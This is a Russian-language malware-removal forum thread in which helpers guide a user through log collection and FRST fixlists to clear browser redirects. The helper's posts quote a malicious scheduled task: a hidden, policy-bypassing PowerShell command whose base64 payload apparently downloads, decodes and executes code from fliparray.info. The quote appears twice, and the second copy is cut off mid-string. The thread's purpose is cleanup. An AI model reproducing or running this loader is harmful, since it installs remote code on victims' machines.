Junior Member (OID)
Вес репутации
31
Всплывающие окна и редиректы во всех браузерах
Сабж в заголовке. Среди новоустановленного софта наблюдался DNS Unlocker, удаление CCleaner'om не помогло.
Win10 x64.
Прикрепить логи от AVZ не могу - утилита крашится (при запуске от имени администратора в том числе) на пункте 1.2 с ошибкой "не найден файл(%system32%\ntoskrnl.exe)", хотя сам такой файл имеется.
Вложения
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Уважаемый(ая) Владимир Самохин , спасибо за обращение на наш форум!
Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в правилах оформления запроса о помощи .
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект .
Здравствуйте,
HiJackThis профиксить
Код:
O2 - BHO: (no name) - {2e32cfe5-df92-4ae5-b0be-609ed0df74a6} - (no file)
O2 - BHO: Money Viking - {c7c5384f-d9e9-4db1-8c72-135ecccbc571} - (no file)
Скачайте программу Universal Virus Sniffer и сделайте полный образ автозапуска uVS .
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
Junior Member (OID)
Вес репутации
31
- Подготовьте лог AdwCleaner и приложите его в теме.
- Сделайте лог Check Browsers' LNK и приложите его в теме.
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
Junior Member (OID)
Вес репутации
31
Вложения
Удалите в AdwCleaner всё, кроме папок с названиями программ которыми вы пользуетесь (если ничем из перечисленного в логе не пользуетесь, то удалите всё). Отчет после удаления прикрепите.
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
Junior Member (OID)
Вес репутации
31
Удалил всё, проблема осталась.
Вложения
- Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.
Примечание : необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением. Убедитесь, что в окне Optional Scan отмечены "List BCD" и "Driver MD5" .
Нажмите кнопку Scan . После окончания сканирования будет создан отчет (FRST.txt ) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении. Если программа была запущена в первый раз, будет создан отчет (Addition.txt ). Пожалуйста, прикрепите его в следующем сообщении.
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
Junior Member (OID)
Вес репутации
31
Вложения
Знакома ли Вам следующая задача закодированная в base64 ссылающая на http://fliparray.info ?
Код:
Task: {03CE4F75-F7BE-41D5-9755-D5BA228A3A75} - System32\Tasks\{7A080B47-7805-040D-0D11-0B7E7A78110B} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwA7ADsAIAAgADsAOwAgACAAOwA7ADsAIAAgACAAIAA7ADsAOwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBzAHQAbwBwACIAOwAkAHMAYwA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsAJABXAGEAcgBuAGkAbgBnAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAkAHMAYwA7ACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAkAHMAYwA7ACQAVgBlAHIAYgBvAHMAZQBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAEQAZQBiAHUAZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAKAGYAdQBuAGMAdABpAG8AbgAgAEIAWQBTAEkASgBWAE0ARwBHAFoATQBGAFcAQQAoACQAcAApAHsAJABuAD0AIgBXAGkAbgBkAG8AdwBQAG8AcwBpAHQAaQBvAG4AIgA7AHQAcgB5AHsATgBlAHcALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewAKAH0AdAByAHkAewBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJABwACAALQBOAGEAbQBlACAAJABuACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAEQAVwBPAFIARAAgAC0AVgBhAGwAdQBlACAAMgAwADEAMwAyADkANgA2ADQAfABPAHUAdAAtAE4AdQBsAGwAOwA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewAgAH0AOwB9ACAAfQBCAFkAUwBJAEoAVgBNAEcARwBaAE0ARgBXAEEAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAQgBZAFMASQBKAFYATQBHAEcAWgBNAEYAVwBBACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAQgBZAFMASQBKAFYATQBHAEcAWgBNAEYAVwBBACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGYAbABpAHAAYQByAHIAYQB5AC4AaQBuAGYAbwAvAHUALwA/AGEAPQBFAEMAbgBKADQANQBQAE4AeQBLAHYATwBhAGcATABrAHAAcwA1AHgAUwBnADEAegBoAE4AcABMAHoANAB0AHkAbABsADIAYwBvAEQAWQBMAEIATABJAEcATgBOAHoAUgBMAHEAMwBZAF8AaQB1ADYAMwBpADUATwBiAHYASgBOAHYAMgA3AFEAYwBYADQARAA5AGQARgB3ADMAXwBMADYAVgBqADgAMQBXAFgAbgB1ADUAOAAzAHEASQBfAEUAVgA3ADcAMgBBAE8AUAB3ADYAbQBMAEoASAA5AFMAZQBNADcAQQBfAEoAbQBoADcAOABuADUAXwBNAHAAdQBlAEsAegBvAEsAbwAxADcATwBJAHAARwB2AEEAeQA1AGsAWQA4AGgAbwA4AGMAeQBFAFcAVgBWAE8AVABWAFkASwBRAGEASAAtAFYAbQBFAHYANQB1AFQASwAyAHQAcABHAHAATwBGADQARgBMADAAVgBNAFkARgBqAEoAMgBxAG4AWQBIAFoANgBEAHoAbAA5ADkAdABXADQAUAB5AGoAcgAzAEcAbABmADEAegA4AFkAWgBXAGsAXwBNAEwAUQBZAFoAcQBXAFMAdgBsAHYAMABpAEEAbABwADgAWQBqAG0AdQBrAHoAYgB3AHEAVwA4AFIAUgBVAEIALQB5AHIAbQBoAHMAcwB6AEMAVABBADYAVwB4AEEAaABDADIAbgBhAGkAMQBYAFQAZQBYAE4AegBxAE4AcQA4AGIAOAB4AGIAZQBDAHgAMgB3AHoASABtAEEAaABfAHIASgBzADQALQBfAEEAQQBkAGsAdABkAHgANgA5AGQAbAByAHcAcgBBAEIAWQA1AFYAZwAxAGIANABRAG0ARwBkAGgAagA2AGsAUwA0AGsAdwAwAEsAYgBMAFMAMQBKAGkAdwAwAFAANQBKAEQAMgBxAHYAeQB5ADIAQQBQAGkAQwBBAGEALQAyADUAdgBGAGQAVwBRAHQAcgBmADYARQBoADEATgAtADkAdgA3AEEASQBNAEMAQgBNAGQARABQAHAAWABZAEgAOQA1ADYARwBtAGQAUQBaAHQASABHAEQALQBrAEUAeQAyAEsAMAAzADMAQwBwAHMAMQBhAF8AagAyAE0AVwA2AHgANwBjADIAUABuADgARQAyAEUAagB6AFcARAB1AEsAaQBlADQAYgBCAHkAaAAtADMAUgBXAEMANQBJAEUAUQBnAEUAcABlAEEAVABPAGwANgBmAFoAOQBHAFYAbABYAHAAbwBKAFgAWAAtAHkAeQBJADkASQBvAHEATAAzAFEANABhAGsAbgBmAGcAQgBuAFEARwBmAEIAWQBTAEkASgBWAE0ARwBHAFoATQBGAFcAQQBFAGMANgBhAFgAdABqAG0AOABaAEcAdwAxAG0ASQBpAE4ATwBHAFMARwBFAGgAagBJAHUAMAAyADUAQgBxAGUAbQBNAEYAdABzAE4ASQBoADcAMQBRAFAAMQBZADgATgBHADcAVQBaAHgAUwBXAFAARQBUAEQAQgBrAGEAeQBEAFQAdABTAFoAdABwADUAZQBXAEEAUQBzAFkAWgBHAFEAMwB5AEYAcwA4AEwAbwB6AGYAYQBYAEcAUwBBAGQAXwBqAG4AWQB3ADYAMABmAFYARABMAC0AbQBmAFUARgBBAHIARABXAEEAUABJAE8AZwBoAF8AQQBJAGkASgBSAFQARwBTAGMAcABYAGcASAB4AE8AawBVAGcAagBGAGsAVQB2AFoASgA4AGgAMABLAGQAWABWAHMANQAzAE0ARABfADUAegBPAFYAbwBnAGoAQwByAEIAagAzAGgAWABwAF8AbgA3AFoANAAyADcAVgBjAGoAWQBvAGQAQQBxAFcAbQBtAGwAUwBCAE4AeABHAEoAWgBYAE4ASgBzAGEAZgBtAHMAZQBqADMAMwB3AE0AeABKAHgATwBsAHIANgBxAHoAUgBGADMAUgBUADAAVwBoAG8AMQBvAHAAcwBRAEUAZwBGAE4AMABSAEsAUQB6ADYAagBKAEgAdwBvAEQAVwBuAGoAcgBSAFIATgAzAG8AOAB3ADUAQwBzAE4ASwBlAGYAOAAxAG4AagBhAGEASQBwAEQAZQA3AFAAbQBKADEAcQAzAGsAZAAzAEMALQBNAEcAQgBXAEcASAB1AEYAMQBoADUAYQBTAGQAdQBRAHYAbABSAHIAbABsAGMATQAxAHYAagBDAEYAQwBjAGsAMwBXAEoAWgBnADAAUgB1AGYAMwBSAGgAQQBfADQAeQB3AHkARABQAGkATAAyAHkAQQAyAGgAcAB6AHEAZwBOAG8AdwA0ACYAYwA9AEgAMQBuAHkARwBaADYAYQBtAHEAaQBEADkANgAyAE4AeQA2AHUASgB2AFMAZwBhAG0AMwBLAEsAagBPADQAUQBCAEQAZgBsAGgAZwBJAEMAUwBiAFgANQBoAEkANABBAGoASwBUAEYAVgBiAFgAcQBLAEwASgBaAFcARgBOADEARgBTAEsAQQBiAEwATQBTAEgAbQBtAHoAcQBKAHgAVwBJAG8AMgBEAFQAUgBrAEoAUQBaAHUATgBjAFgAcgBuADcAbABoAEsAbAAwADEAMwByAGgARQBPAC0AQwBmAEIANgBZAFQAMwBmAGwATQBlAFYAUgBuAEEASQBCAGMAawA4ADQARQB3AG8AWgBjAHEANABRAEwATQB6AGcAaAAzAE8AMQA2AEgAUgBxAFEAVgBEAFYATgBjAHIAdQBmAC0ASAB2AEQAcQBSAHcAQQBpAFkAbgBZADkATgA4AC0AegB6AHgAWQBSAGIAVAB0AG4AMwByAF8ANwB5AF8AVAA1AFcAdABzAHMAdwB3AGwAbQBuAFgAZwBoAE4AQQA2AHEAYgBVADkAQwB0AHUAZwBQAHEANgBuAFQARgBNAEcAbQBiAFAAdwAxAFMANABNAFEAVQAyAEsAZgBEAGIANQBIADAAaQBmAGgAQwBNAEoAUQBQAFgAYwBIADMAcwB6AEsASABiAFoANgBiAHYAdgBfADkATQBUAHYAdgAyAHcAYgBHAE4AMABmAEYARwBXAGYAMABtADkAZgB3AEgAdQA0AGoAcgBUAEwAVwB3AHYAbwB1AHYAOAA1AFYAeQBLAEcAbwBjAFgAegBCAC0AMAAzAHcARwBGAHgASQBVAGEASQBrAFoARwBMAHYAQgBTAEkAdgB3AGsAbwBuAEEAcAB3AEwAYQBPAG0AbAAzAEcAUwBpAHkAcQBUADcATQB5AG0AcABFADkAVAA3AEwARwBDAEIAZABLAHQARgBzAEoAVQA4AGEAXwBSAEcAXwA0AGIAcgAxAHgAVABWAGIAcgBXAHMARABDADcATgA3AG0AdQBxAF8ASAAyAFkAcwBLAFYAcQBaADMAawB1AGYANwB3AF8ANgBYAEEAcgBCAHkAMwBiAEwAUwBhAHUAWABBADAAdgBtADEAOABaAGsALQBxADMARABtADEANABqAEEAZAAtADUAbgBhAGYAdwBYAEYAcQA2AGEAZgBVADEAZABHAF8AQwA2AHUASwBnAG4AQgBHAEkAawBNAE0AbQBQAG0AcwBuAEkAMABQADkAVgBVAHcAZwBqAFgAbQBDAEUAUwBIAGMAMQAxAGIAdgBqAGEAWgAtAEkAVwBIAEMAYgBvAE0AWQBVADIAWQBzAFgAZABMAEgAZAB5AHEAeABXAGsANwA4AEYASgBtAHoATgBJADAAVQAzAEEAaQB6AFMAZwB1AEUAYgBQAFIAdwBwAGcAdgA5AGQAMgA4AFgAZwBLAFoAVwB6AEcANQBlAEwATwA2AEIATgBSAEcAdgBGAGMAdwBpAFYANgBnAEUAVABGAEYAUwBvAHMANwBWAHkAUABXAEQASwBLADUAMgBIAEcAdQBMAHcAaQBWAFMAMwBmAFAAbABQAEkAXwBNAHkAcQByADIANwBUADAAWAB3AEEAMwBFAHYAYwAtAFAANgBxAFMAMQBHAHIAZgAxAC0AbABVAHAAaQBjAHUASAAtAHkAdwBxAGIAUAA3AGgAaQAzAEsAWQBfADkAQgB0AEIAWQAtAGUAbwA3AFQARwBxAFMAWgBWAHcAWABwAE8AMABWAEEAMQB2AG0AVQBLAGQATABsAFMAMQAyADgAeABtAE4AdQBiAGEARwBVADMAQwBoAGIAdABQAGQAcABFADYAawBvADQAYgAtAGYAeABKAFAAeQBXAFYAcgA0AEYAYgB2AGoASABDAE4ASgAtAHgAUQBpAEMAdwBCAG4AbwBjAF8AXwA0AHIAWgBzAGMAYgBIAHEAdABzAHMAYwBYAFUATQB5AHMATQBVAHQAcABhAGkATwBLAE8AYQBfAHkAYgBnAHYAUQBOAEEAdAA4AHAASgBYAE0AdwA2ADYATQBaADIAWABwAGQASwBBAGUAQQB4AG4AOQBMADcAdwBPAE0AWABjAFAAQQBtAHkATwBxAGYAegAwAHAARABiAG4ATQBDAEoAZABzAC0AXwBkAEgAUwBhAGYAUgBLAEoAbwBSAEMAeABmADMAJgByAD0AMgAwADUANgA0ADQANQA5ADgANQA3ADUANAAxADgAMgAwADIANAAiADsAJABzAHQAcwBrAD0AIgB7ADcAQQAwADgAMABCADQANwAtADcAOAAwADUALQAwADQAMABEAC0AMABEADEAMQAtADAAQgA3AEUANwBBADcAOAAxADEAMABCAH0AIgA7ACQAcAByAGkAZAA9ACIAZgBsAG8AYQB0AGkAbgBnACIAOwAkAGkAbgBpAGQAPQAiAE4ASQBMAEwATgBOAEYAQgAiADsAdAByAHkAewBpAGYAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAALQBsAHQAIAAyACkAewBiAHIAZQBhAGsAOwAgAH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQAgAH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIABUAEIAKAAkAHUAcgBsACkAewAkAHIAcQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHIAcQAuAFUAcwBlAEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzAD0AJAB0AHIAdQBlADsAJAByAHEALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAHUAcwBlAHIALQBhAGcAZQBuAHQAIgAsACIATQBvAHoAaQBsAGwAYQAvADQALgAwACAAKABjAG8AbQBwAGEAdABpAGIAbABlADsAIABNAFMASQBFACAANwAuADAAOwAgAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACkAIgApADsAcgBlAHQAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAcgBxAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHUAcgBsACkAKQA7AAoAfQAKAGYAdQBuAGMAdABpAG8AbgAgAFQATABNAFIASwBRAFcAQwAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwB9AAoAcgBlAHQAdQByAG4AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAJABiAHQALAAyACwAKAAkAGIAdAAuAEwAZQBuAGcAdABoAC0AJABlAHgAdAApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7ACAAfQAKACQAcwBjAD0AVABMAE0AUgBLAFEAVwBDACgAVABCACgAJABzAHUAcgBsACkAKQA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJABzAGMAIgA7AH0AYwBhAHQAYwBoAHsACgB9ADsAZQB4AGkAdAAgADAAOwA=
Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
Код:
CreateRestorePoint:
CloseProcesses:
SearchScopes: HKLM -> {A337602D-2A25-4836-AFA1-FE5B6B5221A1} URL = hxxp://www.amazon.co.uk/s/ref=azs_osd_ieauk?ie=UTF-8&tag=hp-uk3-vsb-21&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKLM-x32 -> {A337602D-2A25-4836-AFA1-FE5B6B5221A1} URL = hxxp://www.amazon.co.uk/s/ref=azs_osd_ieauk?ie=UTF-8&tag=hp-uk3-vsb-21&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKU\S-1-5-21-2573649081-3390896530-2138841444-1002 -> {A337602D-2A25-4836-AFA1-FE5B6B5221A1} URL = hxxp://www.amazon.co.uk/s/ref=azs_osd_ieauk?ie=UTF-8&tag=hp-uk3-vsb-21&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
FF Plugin HKU\S-1-5-21-2573649081-3390896530-2138841444-1002: @mail.ru/GameCenter -> C:\Users\йцукенг\AppData\Local\Mail.Ru\GameCenter\NPDetector.dll [No File]
Folder: C:\ProgramData\SystemExplorer
2016-02-19 18:23 - 2016-02-19 18:23 - 00000000 ____D C:\Users\Все пользователи\91de13f6
2016-02-19 18:23 - 2016-02-19 18:23 - 00000000 ____D C:\ProgramData\91de13f6
File: C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
Folder: C:\WINDOWS\system32\F12
Folder: C:\WINDOWS\system32\WinBioPlugIns
Folder: C:\WINDOWS\bcastdvr
Task: {20AAA7D7-4A0E-44E8-887B-C556DFA54CB9} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {2A68777F-12B7-4A74-B93E-FBCEA1CBC8C5} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {35CB3067-02B9-473A-826D-1DDCA4658FDC} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {7B2B8919-ACBD-4965-A672-74E1168EC29F} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {7D0C392E-5D6D-483C-8460-971B2BF2EAA2} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {8370B5B0-5008-44AA-90D4-2A3C4D16265F} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {8C8C5A98-9D4F-490E-8575-B27F34D289C6} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {A1A037F3-5331-4994-AF8E-CE4E5E2C268F} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {B927DAF8-19E8-4687-8207-7993C689EA55} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {DDC15436-0822-4D24-8268-C66C0589C18F} - System32\Tasks\{74F9D181-7BFD-7035-B0B5-6B8D5E8D7370} => /s /n /i:"/rt" "C:\PROGRA~3\91de13f6\bbfb9319.dll"
Task: {DF27F512-2BC0-4F7D-81BF-F282E6752020} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {F10DD45C-9280-4A89-84E8-BD6D40539419} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Reboot:
Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt) . Пожалуйста, прикрепите его в следующем сообщении! Обратите внимание, что компьютер будет перезагружен .
Junior Member (OID)
Вес репутации
31
Нет.
Проблема не пофиксилась.
Вложения
Сообщение от
Владимир Самохин
Нет.
Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
Код:
CreateRestorePoint:
CloseProcesses:
Task: {03CE4F75-F7BE-41D5-9755-D5BA228A3A75} - System32\Tasks\{7A080B47-7805-040D-0D11-0B7E7A78110B} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwA7ADsAIAAgADsAOwAgACAAOwA7ADsAIAAgACAAIAA7ADsAOwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBzAHQAbwBwACIAOwAkAHMAYwA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsAJABXAGEAcgBuAGkAbgBnAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAkAHMAYwA7ACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAkAHMAYwA7ACQAVgBlAHIAYgBvAHMAZQBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAEQAZQBiAHUAZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAKAGYAdQBuAGMAdABpAG8AbgAgAEIAWQBTAEkASgBWAE0ARwBHAFoATQBGAFcAQQAoACQAcAApAHsAJABuAD0AIgBXAGkAbgBkAG8AdwBQAG8AcwBpAHQAaQBvAG4AIgA7AHQAcgB5AHsATgBlAHcALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewAKAH0AdAByAHkAewBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJABwACAALQBOAGEAbQBlACAAJABuACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAEQAVwBPAFIARAAgAC0AVgBhAGwAdQBlACAAMgAwADEAMwAyADkANgA2ADQAfABPAHUAdAAtAE4AdQBsAGwAOwA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewAgAH0AOwB9ACAAfQBCAFkAUwBJAEoAVgBNAEcARwBaAE0ARgBXAEEAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAQgBZAFMASQBKAFYATQBHAEcAWgBNAEYAVwBBACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAQgBZAFMASQBKAFYATQBHAEcAWgBNAEYAVwBBACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGYAbABpAHAAYQByAHIAYQB5AC4AaQBuAGYAbwAvAHUALwA/AGEAPQBFAEMAbgBKADQANQBQAE4AeQBLAHYATwBhAGcATABrAHAAcwA1AHgAUwBnADEAegBoAE4AcABMAHoANAB0AHkAbABsADIAYwBvAEQAWQBMAEIATABJAEcATgBOAHoAUgBMAHEAMwBZAF8AaQB1ADYAMwBpADUATwBiAHYASgBOAHYAMgA3AFEAYwBYADQARAA5AGQARgB3ADMAXwBMADYAVgBqADgAMQBXAFgAbgB1ADUAOAAzAHEASQBfAEUAVgA3ADcAMgBBAE8AUAB3ADYAbQBMAEoASAA5AFMAZQBNADcAQQBfAEoAbQBoADcAOABuADUAXwBNAHAAdQBlAEsAegBvAEsAbwAxADcATwBJAHAARwB2AEEAeQA1AGsAWQA4AGgAbwA4AGMAeQBFAFcAVgBWAE8AVABWAFkASwBRAGEASAAtAFYAbQBFAHYANQB1AFQASwAyAHQAcABHAHAATwBGADQARgBMADAAVgBNAFkARgBqAEoAMgBxAG4AWQBIAFoANgBEAHoAbAA5ADkAdABXADQAUAB5AGoAcgAzAEcAbABmADEAegA4AFkAWgBXAGsAXwBNAEwAUQBZAFoAcQBXAFMAdgBsAHYAMABpAEEAbABwADgAWQBqAG0AdQBrAHoAYgB3AHEAVwA4AFIAUgBVAEIALQB5